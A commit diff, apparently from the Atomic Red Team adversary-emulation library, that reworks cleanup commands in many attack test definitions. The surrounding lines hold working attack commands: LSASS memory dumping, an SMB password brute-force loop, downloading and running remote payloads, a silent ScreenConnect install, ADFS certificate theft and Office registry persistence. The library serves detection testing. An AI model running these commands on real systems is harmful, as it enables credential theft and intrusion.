Cleaning up the Cleanup commands (#1685)

* cleanup fixes * cleanup fixes * cleanup fixes
2021-12-09 11:42:14 -07:00
parent 17d151ba0c
commit 5bb5878e62
26 changed files with 57 additions and 64 deletions
@@ -369,7 +369,7 @@ atomic_tests:
      $ID = $FIELDS[1]
      & "#{createdump_exe}" -u -f #{output_file} $ID
    cleanup_command: |
-      del #{output_file}
+      Remove-Item #{output_file} -ErrorAction Ignore
    name: powershell
    elevation_required: true  
 - name: Dump LSASS.exe using imported Microsoft DLLs
@@ -403,6 +403,6 @@ atomic_tests:
    command: |
      #{xordump_exe} -out #{output_file} -x 0x41
    cleanup_command: |
-      Remove-Item ${output_file} -ErrorAction Ignore
+      Remove-Item #{output_file} -ErrorAction Ignore
    name: powershell
    elevation_required: true
@@ -130,9 +130,8 @@ atomic_tests:
    name: powershell
    elevation_required: false 
    cleanup_command: |
-      write-host ""
      $toremove = #{dump_path} + "\" + '#{dumped_hive}'
-      rm $toremove
+      rm $toremove -ErrorAction Ignore

 - name: dump volume shadow copy hives with System.IO.File
  auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
@@ -165,6 +164,5 @@ atomic_tests:
    name: powershell
    elevation_required: false 
    cleanup_command: |
-      write-host ""
      $toremove = #{dump_path} + "\" + '#{dumped_hive}'
-      rm $toremove
+      rm $toremove -ErrorAction Ignore
@@ -116,10 +116,10 @@ atomic_tests:
  executor:
    command: netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10
    cleanup_command: |-
-      netsh trace stop
-      TIMEOUT /T 50
-      del %temp%\trace.etl
-      del %temp%\trace.cab
+      netsh trace stop >nul 2>&1
+      TIMEOUT /T 5 >nul 2>&1
+      del %temp%\trace.etl >nul 2>&1
+      del %temp%\trace.cab >nul 2>&1
    name: command_prompt
    elevation_required: true
  
@@ -148,7 +148,7 @@ atomic_tests:
      Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
    cleanup_command: |
      $CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
-      $CleanupClass.Delete()
+      try { $CleanupClass.Delete() } catch {}
 - name: WMI Execute rundll32
  auto_generated_guid: 00738d2a-4651-4d76-adf2-c43a41dfb243
  description: |
@@ -50,7 +50,7 @@ atomic_tests:
    command: |
      echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
    cleanup_command: |
-      del "#{file_contents_path}"
+      del "#{file_contents_path}" >nul 2>&1
    name: command_prompt
 - name: Suspicious Execution via Windows Command Shell
  auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
@@ -76,7 +76,7 @@ atomic_tests:
      New-Item -Path "#{output_path}" -ItemType Directory > $null
      & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}"
    cleanup_command: |
-      Remove-Item -Recurse #{output_path}
+      Remove-Item -Recurse #{output_path} -ErrorAction Ignore

 - name: Wmic Group Discovery
  auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2
@@ -66,10 +66,11 @@ atomic_tests:
      Write-Host "End of Hijacking"

    cleanup_command: |
-      Import-Module -Name AzureAD
+      try {
+      Import-Module -Name AzureAD -ErrorAction Ignore
      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzureAD -Credential $Credential
+      Connect-AzureAD -Credential $Credential -ErrorAction Ignore

      $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
      $credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
@@ -80,6 +81,7 @@ atomic_tests:
      }
      Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
      rm "#{path_to_cert}\#{service_principal_name}.pfx"
+      } catch {}
      
    name: powershell
    elevation_required: false
@@ -146,10 +148,11 @@ atomic_tests:
      Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
      Write-Host "End of Hijacking"
    cleanup_command: |
-      Import-Module -Name AzureAD
+      try {
+      Import-Module -Name AzureAD -ErrorAction Ignore
      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzureAD -Credential $Credential
+      Connect-AzureAD -Credential $Credential -ErrorAction Ignore

      $app = Get-AzureADApplication -Searchstring "#{application_name}"
      $credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
@@ -160,6 +163,7 @@ atomic_tests:
      }
      Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
      rm "#{path_to_cert}\#{application_name}.pfx"
+      } catch {}
    name: powershell
    elevation_required: false
 - name: AWS - Create Access Key and Secret Key
@@ -438,7 +438,7 @@ atomic_tests:
    cleanup_command: |
      $inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" 
      $file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
-      cmd.exe /c "del $file_to_be_removed"
+      if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }
    name: powershell

 - name: Curl Download File
@@ -33,8 +33,8 @@ atomic_tests:
      echo "Password!" >> #{input_file_passwords}
      @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
    cleanup_command: |-
-      del #{input_file_users}
-      del #{input_file_passwords}
+      del #{input_file_users} >nul 2>&1
+      del #{input_file_passwords} >nul 2>&1
 - name: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)
  auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
  description: |
@@ -106,5 +106,5 @@ atomic_tests:
    command: |
      Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
    cleanup_command: |
-      Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine
+      try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine -Force } catch {}
    name: powershell
@@ -14,7 +14,7 @@ atomic_tests:
      dir c: /b /s .docx | findstr /e .docx
      for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
    cleanup_command: |
-      del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
+      del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1
    name: command_prompt
 - name: Automated Collection PowerShell
  auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
@@ -2,7 +2,7 @@ attack_technique: T1134.002
 display_name: "Create Process with Token"
 atomic_tests:
 - name: Access Token Manipulation
-  auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e
+  auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e
  description: |
    This Action demonstrates how an access token for a specific program can spawn another program under a different owner. 
    Adversaries can leverage access tokens to run programs under a different user not only to achieve privilege escalation but also to evade detection by blending in with normal user activity. 
@@ -15,9 +15,6 @@ atomic_tests:
      $owners = @{}
      gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
      Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
-      Set-Location $PathToAtomicsFolder
-      .\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
-    cleanup_command: |
-      taskkill /im cmd.exe /f
+      $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
    name: powershell
    elevation_required: true
@@ -17,5 +17,5 @@ atomic_tests:
    command: |
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}"
    cleanup_command: |
-      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1
    name: command_prompt
@@ -36,4 +36,4 @@ atomic_tests:
    command: |
      reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
    cleanup_command: |
-      reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f
+      reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1
@@ -17,6 +17,6 @@ atomic_tests:
      mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
      echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
    cleanup_command: |
-      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
-      del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f >nul 2>&1
+      del %APPDATA%\Microsoft\Outlook\VbaProject.OTM >nul 2>&1
    name: command_prompt
@@ -114,5 +114,5 @@ atomic_tests:
    command: |
      set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
    cleanup_command: |
-      del #{cleanup_path}\#{cleanup_file} >null 2>&1
+      del #{cleanup_path}\#{cleanup_file} >nul 2>&1
    name: command_prompt
@@ -315,7 +315,7 @@ atomic_tests:
      Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
      & "#{pua_file}"
    cleanup_command: |
-      Remove-Item #{pua_file}
+      Remove-Item #{pua_file} -ErrorAction Ignore
 - name: Office Generic Payload Download
  auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c
  description: |
@@ -82,7 +82,7 @@ atomic_tests:
      $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
      Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi"
      msiexec /i $installer /qn
-    cleanup_command:
+    cleanup_command: | 
      $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
      msiexec /x $installer /qn
    name: powershell
@@ -49,7 +49,7 @@ atomic_tests:
    command: |
      #{msxsl_exe} #{xmlfile} #{xslfile}
    cleanup_command: | 
-      Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
+      del #{msxsl_exe} >nul 2>&1
    name: command_prompt
 - name: MSXSL Bypass using remote files
  auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
@@ -85,7 +85,7 @@ atomic_tests:
    command: |
      #{msxsl_exe} #{xmlfile} #{xslfile}
    cleanup_command: | 
-      Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
+      del -Path #{msxsl_exe} >nul 2>&1
    name: command_prompt
 - name: WMIC bypass using local XSL file
  auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
@@ -95,28 +95,18 @@ atomic_tests:
  - windows
  input_arguments:
    file_or_folder:
-      description: Path of the file or folder remove attribute.
+      description: Path of the files to hide.
      type: Path
      default: '%temp%\T1222.001_attrib_2'
-  dependency_executor_name: command_prompt
-  dependencies:
-  - description: |
-      Test requires a file to modify to be located at (#{file_or_folder})
-    prereq_command: |
-      IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
-    get_prereq_command: |
-      mkdir #{file_or_folder}
-      echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
-      echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
  executor:
    command: |
+      mkdir #{file_or_folder} >nul 2>&1
+      echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
+      echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
      attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt
      attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
    cleanup_command: |
-      attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt
-      attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt
-      del #{file_or_folder}\T1222.001_attrib*.txt
-      rmdir #{file_or_folder}
+      del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1
    name: command_prompt
 - name: 'Grant Full Access to folder for Everyone - Ryuk Ransomware Style'
  auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
@@ -64,11 +64,13 @@ atomic_tests:
      Get-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}"
      Write-Host "End of federation configuration."
    cleanup_command: |
-      Import-Module AzureADPreview
+      try {
+      Import-Module AzureADPreview -ErrorAction Ignore
      $PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
-      Connect-AzureAD -Credential $Credential > $null
+      Connect-AzureAD -Credential $Credential -ErrorAction Ignore
      Remove-AzureADExternalFederationDomain -ExternalDomainName "#{domain_name}"
+      } catch {}
    name: powershell
    
    
@@ -112,6 +112,6 @@ atomic_tests:
    command: |
      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    cleanup_command: |
-      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable
-    name: powershell
+      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
+    name: command_prompt
    elevation_required: true
@@ -15,6 +15,6 @@ atomic_tests:
    command: |
      reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
    cleanup_command: |
-      reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
+      reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1
    name: command_prompt
    elevation_required: true
@@ -125,8 +125,8 @@ atomic_tests:
      Get-ChildItem | Where-Object {$_ -like "ADFS*"}
      Write-Host "`nCertificates retrieved successfully"
    cleanup_command: |
-      Remove-Item -Path ".\ADFS_encryption.pfx"
-      Remove-Item -Path ".\ADFS_signing.pfx"
+      Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
+      Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
    name: powershell
 - name: ADFS token signing and encryption certificates theft - Remote
  auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
@@ -194,6 +194,6 @@ atomic_tests:
      Get-ChildItem | Where-Object {$_ -like "ADFS*"}
      Write-Host "`nCertificates retrieved successfully"
    cleanup_command: |
-      Remove-Item -Path ".\ADFS_encryption.pfx"
-      Remove-Item -Path ".\ADFS_signing.pfx"
+      Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
+      Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
    name: powershell
@@ -117,9 +117,7 @@ atomic_tests:
         Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
         Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
      }
-      catch {
-         Write-Host "Elevation required but not provided" -ForegroundColor Red
-      }
+      catch { }
    name: powershell
    elevation_required: true
 - name: Install root CA on Windows with certutil
@@ -147,8 +145,10 @@ atomic_tests:
    command: |
      certutil -addstore my #{pfx_path}
    cleanup_command: |
+      try {
      $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
      Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
      Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      } catch { }
    name: powershell
    elevation_required: true
@@ -519,12 +519,14 @@ atomic_tests:
      Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
      Get-AntiPhishRule
    cleanup_command: |
-      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      if("#{password}" -ne "") {
+      $secure_pwd = ("#{password}" + "") | ConvertTo-SecureString -AsPlainText -Force
      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
      Connect-ExchangeOnline -Credential $creds
      $test = Get-AntiPhishRule
      Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
      Get-AntiPhishRule
+      } 
    name: powershell
    elevation_required: false
 - name: Disable Windows Defender with DISM